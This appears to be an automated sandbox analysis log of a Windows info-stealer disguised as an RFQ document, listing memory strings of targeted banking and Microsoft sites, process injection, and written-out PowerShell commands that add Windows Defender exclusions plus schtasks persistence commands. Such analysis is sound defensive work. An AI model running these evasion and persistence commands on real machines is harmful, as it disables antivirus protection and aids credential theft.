Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1599728924.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: nDEusQ.exe, 0000000E.00000002.2799234243.00000000012D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllme
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2799681396.0000000000C57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Code function: 9_2_065C9448 LdrInitializeThunk,

9_2_065C9448

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\nDEusQ.exe

Memory written: C:\Users\user\AppData\Roaming\nDEusQ.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process created: C:\Users\user\AppData\Roaming\nDEusQ.exe "C:\Users\user\AppData\Roaming\nDEusQ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
